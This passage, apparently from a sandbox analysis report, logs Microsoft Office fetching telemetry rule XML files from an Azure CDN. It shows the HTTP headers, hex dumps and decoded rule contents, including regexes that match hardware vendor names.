                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  75192.168.2.44982313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:14 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:14 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:14 GMT
                  Content-Type: text/xml
                  Content-Length: 432
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                  ETag: "0x8DC582BAABA2A10"
                  x-ms-request-id: fa910cef-e01e-003c-72dd-21c70b000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044814Z-16849878b78ngdnlw4w0762cms00000005rg00000000h7v7
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:14 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                  Session IDSource IPSource PortDestination IPDestination Port
                  76192.168.2.44982213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:14 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:14 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:14 GMT
                  Content-Type: text/xml
                  Content-Length: 472
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                  ETag: "0x8DC582B91EAD002"
                  x-ms-request-id: 34547014-f01e-003f-75cc-20d19d000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044814Z-16849878b78k8q5pxkgux3mbgg00000005kg00000000n0wr
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:14 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  77192.168.2.44982513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:14 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:14 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:14 GMT
                  Content-Type: text/xml
                  Content-Length: 427
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                  ETag: "0x8DC582BB464F255"
                  x-ms-request-id: a2e914b6-401e-0029-5fce-219b43000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044814Z-16849878b784cpcc2dr9ch74ng00000005r000000000m8hd
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:14 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                  Session IDSource IPSource PortDestination IPDestination Port
                  78192.168.2.44982613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:15 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:15 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:15 GMT
                  Content-Type: text/xml
                  Content-Length: 474
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                  ETag: "0x8DC582BA4037B0D"
                  x-ms-request-id: da0abffb-c01e-008d-1f17-242eec000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044815Z-r197bdfb6b4ld6jca8vdwzkams000000070000000000axr2
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:15 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  79192.168.2.44982813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:15 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:15 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:15 GMT
                  Content-Type: text/xml
                  Content-Length: 472
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                  ETag: "0x8DC582B984BF177"
                  x-ms-request-id: 0fafa3ff-301e-0051-1f59-2338bb000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044815Z-r197bdfb6b42sc4ddemybqpm140000000m300000000057fp
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:15 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  80192.168.2.44982913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:15 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:15 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:15 GMT
                  Content-Type: text/xml
                  Content-Length: 405
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                  ETag: "0x8DC582B942B6AFF"
                  x-ms-request-id: 41e4118e-001e-0017-175a-230c3c000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044815Z-r197bdfb6b4cz6xrsdncwtgzd40000000m7g000000001t64
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:15 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                  Session IDSource IPSource PortDestination IPDestination Port
                  81192.168.2.44982713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:15 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:15 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:15 GMT
                  Content-Type: text/xml
                  Content-Length: 419
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                  ETag: "0x8DC582BA6CF78C8"
                  x-ms-request-id: c561987e-801e-0015-0d0b-22f97f000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044815Z-16849878b78bkvbz1ry47zvsas00000005qg00000000dshd
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:15 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                  Session IDSource IPSource PortDestination IPDestination Port
                  82192.168.2.44983013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:15 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:15 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:15 GMT
                  Content-Type: text/xml
                  Content-Length: 468
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                  ETag: "0x8DC582BBA642BF4"
                  x-ms-request-id: af82a6d2-001e-00a2-4ff2-24d4d5000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044815Z-15b8d89586f989rks44whx5v7s0000000c3000000000dytb
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:15 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  83192.168.2.44983113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:15 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:16 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:16 GMT
                  Content-Type: text/xml
                  Content-Length: 174
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                  ETag: "0x8DC582B91D80E15"
                  x-ms-request-id: 2df5d45d-601e-003e-40f7-213248000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044816Z-16849878b78k46f8kzwxznephs00000005h000000000h2d8
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:16 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                  Session IDSource IPSource PortDestination IPDestination Port
                  84192.168.2.44983213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:16 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:16 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:16 GMT
                  Content-Type: text/xml
                  Content-Length: 1952
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                  ETag: "0x8DC582B956B0F3D"
                  x-ms-request-id: 8c481607-b01e-0053-3f2b-21cdf8000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044816Z-16849878b784cpcc2dr9ch74ng00000005u00000000094gy
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:16 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                  Session IDSource IPSource PortDestination IPDestination Port
                  85192.168.2.44983413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:16 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:18 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:18 GMT
                  Content-Type: text/xml
                  Content-Length: 501
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                  ETag: "0x8DC582BACFDAACD"
                  x-ms-request-id: 0856d5df-001e-00ad-56f3-24554b000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044817Z-r197bdfb6b4ld6jca8vdwzkams000000070000000000axtp
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:18 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                  Session IDSource IPSource PortDestination IPDestination Port
                  86192.168.2.44983313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:16 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:16 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:16 GMT
                  Content-Type: text/xml
                  Content-Length: 958
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                  ETag: "0x8DC582BA0A31B3B"
                  x-ms-request-id: fc120a29-401e-000a-4ff2-244a7b000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044816Z-15b8d89586f2hk2885zk3a4enc0000000cb00000000001m6
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
